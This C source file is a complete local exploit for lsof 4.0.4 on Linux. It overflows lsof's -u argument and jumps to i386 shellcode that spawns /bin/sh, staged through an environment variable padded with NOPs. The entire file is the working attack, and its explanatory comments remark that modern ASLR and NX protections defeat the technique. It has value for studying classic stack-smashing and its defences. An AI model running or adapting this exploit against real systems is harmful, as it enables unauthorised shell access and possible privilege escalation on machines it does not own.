/*
 *
 *  Xploit for lsof 4.0.4 (Only tested under linux)
 *
 *  By:
 *          Zhodiac <zhodiac@jjf.org>
 *          - J.J.F. / Hackers Team - 
 *             http://www.jjf.org
 *
 *  Based on Aleph1's article at phrack49 called
 *            "Smashing the stack for fun and profit"
 *
 *   #include <standard/disclaimer.h>
 *   
 *   This xploit was coded "only" to prove it can be done.
 *  
 */

#include <stdlib.h>
#include <stdio.h>

#define OFFSET                            0   /* adjustment subtracted from the stack-pointer guess (0 = use it as-is) */
#define BUFFERSIZE                       32   /* bytes of buff, filled with repeated copies of the guessed address */
#define EGGSIZE                        2048   /* bytes of the environment buffer: NOP padding followed by the payload */
#define NOP                            0x90   /* i386 single-byte nop, used as the padding byte */

/* Payload bytes (i386 Linux) reproduced from the Phrack 49 article cited in the
 * header; the trailing "/bin/sh" is the program name embedded in it. Kept
 * byte-for-byte as on the original listing and not decoded here. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer: the asm copies %esp into %eax, which the
 * i386 calling convention uses as the integer return register. There is no C
 * return statement, so the value only "returns" by that side effect — this is
 * undefined behaviour in standard C, i386-only, and compiler-dependent. */
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

/* Entry point. Builds an over-long "-u" argument for lsof out of repeated
 * copies of a guessed stack address, exports the padded payload through the
 * environment as EGG=..., and runs lsof via system(). Declared void rather
 * than int, so the process exit status is unspecified. argc/argv are unused. */
void main(int argc, char *argv[]) {
  /* comando: command line handed to system(); buff: the -u argument;
   * egg: heap buffer that becomes the EGG environment variable. */
  char comando[128],buff[BUFFERSIZE], *egg, *ptr;
  long *addr_ptr, addr;
  int i;

  printf("\nXploit for lsof 4.04 by Zhodiac - J.J.F. / Hackers Team - <zhodiac@jjf.org>\n\n");

  if ((egg=malloc(EGGSIZE))==NULL) {
          perror("malloc");
          exit(-1);
          }

  /* The address is guessed from this process's own stack pointer. That only
   * works when the child lsof process sees the same stack base (no ASLR) and
   * can execute code on its stack (no NX/W^X) — both are mitigations that
   * defeat this technique on current systems. */
  addr = get_esp() - OFFSET;
  ptr = buff;
  addr_ptr = (long *) ptr;
  /* Fills buff with BUFFERSIZE/4 copies of addr. Assumes sizeof(long) == 4
   * (i386); on LP64 each store is 8 bytes and the loop overruns buff itself.
   * No NUL terminator is ever written, so the "%s" below reads past buff
   * (undefined behaviour in this program). */
  for (i = 0; i < BUFFERSIZE; i+=4) *(addr_ptr++) = addr;
  ptr = egg;
  /* NOP padding up to the payload, then the payload itself via strcpy;
   * strlen/strcpy/memcpy are used without <string.h>, i.e. implicitly declared. */
  for (i = 0; i < EGGSIZE - strlen(shellcode) - 1; i++) *(ptr++) = NOP;
  strcpy(ptr,shellcode);
  /* Overwrites the first four padding bytes with "EGG=" so putenv() exports
   * the whole buffer as an environment variable inherited by the child. */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  /* lsof is run by absolute path with buff as the -u (user) argument; the
   * header implies lsof 4.0.4 copies this argument without a bounds check —
   * not verifiable from this file, confirm against the lsof source. Input
   * validation of -u in lsof is the fix on the target side. */
  sprintf(comando,"/usr/sbin/lsof -u %s",buff);
  system(comando);

}

